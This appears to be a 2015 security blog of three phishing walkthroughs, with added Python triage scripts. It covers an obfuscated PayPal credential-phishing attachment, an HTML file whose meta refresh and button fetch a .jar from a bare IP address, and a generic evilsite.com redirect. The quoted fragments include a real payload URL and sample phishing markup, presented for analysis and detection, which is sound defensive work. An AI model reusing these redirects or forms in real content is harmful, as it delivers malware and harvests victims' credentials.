
Monday, October 26, 2015

Walking Thru a Phishing Email Attachment

Here's a walk-thru of how I look at a Phishing Email Attachment.

There was a McAfee alert 'HTML/Phishing.b' on a file called 'form.html'. This likely came from a user opening/clicking on an attachment in an email.

Since McAfee marked it as infected and deleted it, the file was no longer in the original folder where the alert had triggered. But it was still in the McAfee Quarantine folder as a .bup, so I was able to extract it like this.

The file that came back was this ugly JavaScript, obfuscated and hard to read. At a high level, the document contains a massively long Base64-encoded variable, which the ugly JavaScript then decodes and de-obfuscates into working HTML code that the user's browser or email client would display.

I know this because at the bottom I see the JavaScript call 'document.write', which is used to write raw HTML to a page. To be safe, I didn't want to run this JavaScript directly, so I re-saved it with 'document.write' changed to 'console.log'. That lets me see the HTML without the browser actually rendering it (much safer). Then I hit F12 to open the Firefox developer tools, reloaded the JavaScript, and saw in the Console tab that the HTML was now output for me.

After the JavaScript runs, the HTML displayed is this: an HTML form styled nicely to phish PayPal credentials and send them to a .ru (Russian) website.
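The approach above still executes the attacker's script, just with its output sink redirected. An added example (not code from the original post) of a purely static triage that never runs the JavaScript: it looks for the decode-then-render sinks, pulls out any long quoted Base64 literal, decodes it, and lists the form/link URLs in whatever decodes to markup. SAMPLE_JS is a constructed stand-in for the attachment, and the domain phish.example is a placeholder.

```python
"""Static triage of a JavaScript-obfuscated HTML attachment (no JS executed)."""
import base64
import binascii
import re

# Constructed stand-in for the attachment described above: a phishing form is
# carried as one long Base64 literal that the script decodes and hands to
# document.write(). Built from plaintext here so the sample stays readable;
# the real file's literal was further obfuscated.
_FAKE_FORM = (
    '<form action="http://phish.example/login.php" method="post">'
    '<input name="email"><input name="password" type="password"></form>'
)
_B64 = base64.b64encode(_FAKE_FORM.encode()).decode()
SAMPLE_JS = f'var _0x4a2b = "{_B64}";\ndocument.write(atob(_0x4a2b));\n'

# Sinks and decoders that usually mark a "decode, then render" script.
SINKS = ("document.write", "eval(", "unescape(", "atob(", "String.fromCharCode")
_URL_ATTR = re.compile(r'(?:action|href|src)\s*=\s*["\']?([^"\'\s>]+)', re.I)


def find_sinks(js):
    """Which suspicious sinks/decoders appear in the script, with counts."""
    return {s: js.count(s) for s in SINKS if s in js}


def extract_base64_payloads(js, min_len=64):
    """Decode every quoted Base64 literal of at least min_len characters that
    turns out to be valid UTF-8 text; binary or malformed blobs are skipped."""
    literal = re.compile(r'["\']([A-Za-z0-9+/]{%d,}={0,2})["\']' % min_len)
    payloads = []
    for blob in literal.findall(js):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        payloads.append(text)
    return payloads


def extract_urls(html):
    """Every action/href/src destination found in a fragment of markup."""
    return sorted(set(_URL_ATTR.findall(html)))


def triage(js):
    """Summarise the script: sinks present, decoded markup, and where the
    decoded markup would send the victim's data."""
    sinks = find_sinks(js)
    payloads = extract_base64_payloads(js)
    markup = [p for p in payloads if "<" in p]
    return {
        "sinks": sinks,
        "decoded_html": markup,
        "urls": sorted({u for p in markup for u in extract_urls(p)}),
        # The post's pattern: a Base64 blob that decodes to HTML, fed to document.write
        "decode_then_write": "document.write" in sinks and bool(markup),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_JS).items():
        print(key, "->", value)
```

Because nothing is executed, this only catches the single-layer case the post describes (one Base64 literal, decoded once); a script that builds the blob from pieces or XORs it first needs the browser-console approach, run on an isolated machine.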

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, March 31, 2015

Phishing Email Example Walkthrough

I recently posted a phishing email example. I thought it'd be interesting to quickly walk-through what it's doing.

The Subject 'FW: Remittance reconfirmations' tries to draw your attention by looking like a previously forwarded email, and containing talk about payments/remittance.

The Body is actually playing on your friendly side saying 'Kindly Verify the attached remittance and purpose.'

The attachment seems pretty benign in nature as it's named 'Remitance004.html'. But don't be fooled, even '.html' files (as I've blogged about before) can be dangerous.

Top Urgent!
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com

Subject: hello
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello


As seen above, the body of the email makes it look like this was forwarded over and over to multiple people, giving it some legitimacy.

But once we look into the attachment ('Remitance004.html') we are able to confirm that it's really just a malicious phish attempt.

<META http-equiv="refresh" content="9;url=http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar">

The above line should tip you off, because it says that if you open the HTML file in a browser it will not display the contents, but will instead automatically redirect you to this '.jar' file, which prompts for download. '.jar' files are dangerous. Think of them as executable zip files. They'll probably kick off a storm of activity on your PC that ultimately ends up compromising your system. Don't open '.jar' files unless you know what you're doing.

<span class="btn"> <!-- on click file will be downloaded--> <a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" class="small radius button btn_red"><b>Download</b></a> </span>

Otherwise, if you open it in your email client, you'll be shown a pretty-looking page, and the code above shows that part of that page is a button that, if clicked, loads the same malicious jar file.

Don't open emails from people you don't know, especially if it's got an attachment.


Monday, March 16, 2015

Malware in a .html File

When you receive an email with an attachment, you might be extra cautious if the attachment ends in certain extensions like

  • .EXE
  • .ZIP
  • .BAT
  • .PS1


You might even be a little concerned nowadays with some more common extensions like

  • .PDF
  • .DOCX
  • .XLSX
  • .PPTX


But how many of you would think that the following extensions are concerning?

  • .htm
  • .html


Long story short, you should. You may think you're loading a local, harmless HTML file, but here's an example where you'd actually be loading an evil file from a separate site, and maybe you wouldn't even know it. If the .htm/.html file contains the following ...

<html> <meta http-equiv="refresh" content="0; url=http://www.evilsite.com/evilfile"> </html>
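Both the Remitance004.html post above (a meta refresh and a download button pointing at a .jar on a bare IP) and this generic redirect come down to the same check: an attachment that exists only to send the browser somewhere else. An added example (not code from either post) that runs that check with Python's standard html.parser, without rendering anything; the two Remitance004 fragments and the evilsite.com line are the ones quoted in the posts, and RISKY_EXT is an assumed starter list.

```python
"""Flag HTML attachments whose only job is to send the reader somewhere else."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# File types that download-and-run rather than display (the posts' '.jar'
# case plus other executable types). Assumed starter list; extend to taste.
RISKY_EXT = (".jar", ".exe", ".scr", ".js", ".vbs", ".bat", ".ps1", ".zip")

# The fragments quoted in the posts above, joined into one sample document.
REMITANCE_HTML = (
    '<META http-equiv="refresh" content="9;url=http://94.242.224.181/'
    'www.notornsecurity.com/Remitance004-pdf.jar">\n'
    '<span class="btn"> <!-- on click file will be downloaded--> '
    '<a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" '
    'class="small radius button btn_red"><b>Download</b></a> </span>'
)
GENERIC_HTML = '<html> <meta http-equiv="refresh" content="0; url=http://www.evilsite.com/evilfile"> </html>'


def parse_refresh(content):
    """Split a meta-refresh content value such as '9;url=http://x' into
    (delay_seconds, url). Returns (None, None) when there is no URL part."""
    if ";" not in content:
        return None, None
    delay_part, rest = content.split(";", 1)
    rest = rest.strip()
    if rest.lower().startswith("url="):
        rest = rest[4:].strip().strip("'\"")
    try:
        delay = int(delay_part.strip())
    except ValueError:
        delay = None
    return delay, rest or None


def assess_url(url):
    """Reasons a destination looks like a payload fetch rather than content."""
    reasons = []
    parsed = urlparse(url)
    if parsed.scheme in ("http", "https"):
        reasons.append("remote")            # a "local" file actually loads from the network
    try:
        ipaddress.ip_address(parsed.hostname or "")
        reasons.append("ip-literal-host")   # no domain name, just a bare IP
    except ValueError:
        pass
    if parsed.path.lower().endswith(RISKY_EXT):
        reasons.append("executable-download")
    return reasons


class RedirectFinder(HTMLParser):
    """Collect meta-refresh targets, links and embedded sources without rendering."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}  # names arrive lowercased
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            delay, url = parse_refresh(a.get("content", ""))
            if url:
                self._record("meta-refresh", url, delay)
        elif tag == "a" and a.get("href"):
            self._record("link", a["href"], None)
        elif tag in ("iframe", "script", "object", "embed") and a.get("src"):
            self._record(tag + "-src", a["src"], None)

    def _record(self, kind, url, delay):
        self.findings.append({"kind": kind, "url": url, "delay": delay,
                              "reasons": assess_url(url)})


def scan(html):
    """All outbound destinations in the document, each with its risk reasons."""
    finder = RedirectFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


def is_suspicious(html):
    """A remote meta refresh, or any executable download target, is enough."""
    for f in scan(html):
        if f["kind"] == "meta-refresh" and "remote" in f["reasons"]:
            return True
        if "executable-download" in f["reasons"]:
            return True
    return False


if __name__ == "__main__":
    for sample in (REMITANCE_HTML, GENERIC_HTML):
        print(is_suspicious(sample), scan(sample))
```

A meta refresh is treated as suspicious on its own when it points off-box, because a real attachment has no reason to bounce the reader to the network the moment it opens; an ordinary link only trips the rule when its target is an executable type.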

Don't open files you weren't expecting, from people you weren't expecting to send them.
